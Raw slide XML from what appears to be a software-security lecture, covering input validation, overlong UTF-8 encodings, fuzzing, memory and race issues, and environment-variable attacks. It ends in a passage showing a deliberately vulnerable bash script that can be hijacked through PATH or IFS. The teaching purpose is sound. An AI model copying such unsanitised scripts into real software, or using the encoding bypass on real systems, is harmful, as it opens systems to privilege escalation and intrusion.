              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>redundant variants; </a:t>
            </a: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/ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-80" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>2F, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>but C0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AF  and E0 80 AF may also be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-1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accepted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Must canonicalize input before checking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7367" y="1006855"/>
            <a:ext cx="44240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Validating </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Numeric</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-65" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Input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09826"/>
            <a:ext cx="7494270" cy="438531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May have data representing numeric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Internally stored in fixed sized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value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8, 16, 32, 64-bit </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>integers </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>or 32, 64, 96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float</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755015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signed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unsigned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correctly interpret text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form…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…and then process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consistently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there are issues comparing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>signed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unsigned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spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>large </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>positive unsigned is negative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signed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could be used to thwart </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>overflow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check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07967" y="1006855"/>
            <a:ext cx="2442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Input</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-65" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Fuzzing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64805" cy="4422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5593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Powerful testing method using a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>large </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>range of  randomly generated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inputs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to test </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>whether </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>program/function correctly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handles  abnormal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inputs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simple, free of assumptions,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cheap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assists with reliability as well as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355600" marR="763905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Can also use templates to generate classes of  known problem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inputs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could then </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>miss </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>bugs, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>so </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>use random </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>as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well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31540" y="1006855"/>
            <a:ext cx="3195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Software</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-1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613015" cy="3433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50622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Many vulnerabilities result from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poor  programming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practices</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" marR="66230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cf. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Open </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-75" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Application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spc="-70" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Top</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-370" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-70" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Ten  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>include 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>software </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>related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flaws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Often from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>insufficient </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>checking / validation of  program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input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Awareness </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of issues 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critical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81148" y="1006855"/>
            <a:ext cx="4897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Writing </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Safe Program</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-70" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Code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25065"/>
            <a:ext cx="7959090" cy="459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550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Next concern is processing of data by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some  algorithm to solve required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problem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Whether compiled to machine code or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interpreted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have execution of machine</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="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instructions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manipulation </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of data </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>in memory and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registers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issues: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correct algorithm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implementation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correct machine instructions </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>for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algorithm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valid </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>manipulation </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of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454" y="1006855"/>
            <a:ext cx="6097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Correct Algorithm</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Implementation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2226"/>
            <a:ext cx="6588759" cy="44176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Issue of good program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development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correctly handle all problem</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="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variants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cf. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Netscape </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>random number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error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supposed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be unpredictable, but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wasn’t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When debug/test code left in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production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to access </a:t>
            </a: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bypass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checks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c.f. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Morris </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-55" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Worm </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>exploit of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sendmail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Interpreter incorrectly handles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semantics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Hence care needed in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design/implement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11627" y="1006855"/>
            <a:ext cx="4833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Correct Machine</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-65" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Language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79346"/>
            <a:ext cx="7993380" cy="454088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12255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machine instructions correctly implement  high-level language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code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often ignored by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programmers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assume compiler/interpreter is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correct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c.f. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Ken </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Thompson’s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paper</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="28511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Requires comparing machine code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original  source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slow and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> difficult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required for higher Common Criteria </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Evaluation  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Assurance </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Levels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(EALs)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30677" y="1006855"/>
            <a:ext cx="479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Correct Data</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Interpretation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281545" cy="417766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Data stored as bits/bytes in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computer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grouped as </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>words, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>longwords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etc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interpretation depends on machine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instruction</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="22352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Languages provide </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>different </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>capabilities for  restricting/validating data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strongly </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>typed languages </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>more </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>limited,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safer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others </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>more </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>liberal, flexible, less </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>safe </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e.g.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Strongly typed languages are safer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54527" y="1006855"/>
            <a:ext cx="4149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Correct Use of</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Memory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1909074"/>
            <a:ext cx="8071484" cy="472630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Issue of dynamic memory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allocation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used to manipulate unknown amounts of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allocated when needed, released when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done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Memory leak occurs if incorrectly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released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Many older languages have no explicit support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for  dynamic memory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allocation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rather </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>use standard </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>library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functions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programmer </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ensures correct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allocation/release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Modern </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>languages handle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automatically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1057" y="1099820"/>
            <a:ext cx="63334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Race Conditions in Shared</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Memory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2153665"/>
            <a:ext cx="7889240" cy="3555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181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When multiple threads/processes access shared  data / memory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Unless access synchronized can get corruption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loss of changes due to overlapping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accesses…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…so use </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>suitable synchronization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primitives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correct </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>choice </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sequence </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>may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obvious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Address </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>the issue of access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deadlock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4755" y="1006855"/>
            <a:ext cx="3549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Interacting with</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>O/S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71737"/>
            <a:ext cx="6924040" cy="423354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Programs </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>execute on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>systems </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>under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O/S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mediates </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>and shares </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>access to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constructs </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>execution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environment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environment </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>variables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arguments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Systems have multiple users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access </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>permissions on resources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Programs may access shared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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" i="1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94151" y="1006855"/>
            <a:ext cx="40703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Environment</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-85" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>Variables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074"/>
            <a:ext cx="6900545" cy="430720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Set of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>string </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>values inherited from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parent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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>affect </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>process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behavior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spc="-114" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>PATH, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IFS,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="80" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-50" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>LD_LIBRARY_PATH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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>can alter for its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children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Another source </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of untrusted program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input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Attackers use to try to escalate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privileges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Privileged shell scripts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Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>targeted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very </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>difficult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write safely </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>and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correctly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53716" y="883411"/>
            <a:ext cx="4950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Example </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>Vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Scripts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09826"/>
            <a:ext cx="7119620" cy="20370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Using </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-155" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>PATH </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>or IFS </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>environment</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="12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variables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Cause </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to execute attackers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program…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…with privileges granted to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script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Almost impossible to prevent in some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form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57977" y="4027091"/>
            <a:ext cx="6254115" cy="900430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
          <a:ln w="31942">
            <a:solidFill>
              <a:srgbClr val="000000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121285">
              <a:lnSpc>
                <a:spcPts val="1914"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1650" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>#!/bin/bash</a:t>
            </a:r>
            <a:endParaRPr sz="1650">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="121285">
              <a:lnSpc>
                <a:spcPts val="1855"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1650" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>user=`echo </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="-45" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'s/@.*$//'`</a:t>
            </a:r>
            <a:endParaRPr sz="1650">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="121285">
              <a:lnSpc>
                <a:spcPts val="1914"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1650" spc="10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>grep </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/var/local/accounts/ipaddrs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57977" y="5205128"/>
            <a:ext cx="6254115" cy="1370965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
          <a:ln w="31942">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="106680" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="121285" marR="1544955">
              <a:lnSpc>
                <a:spcPts val="1850"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="840"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1650" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
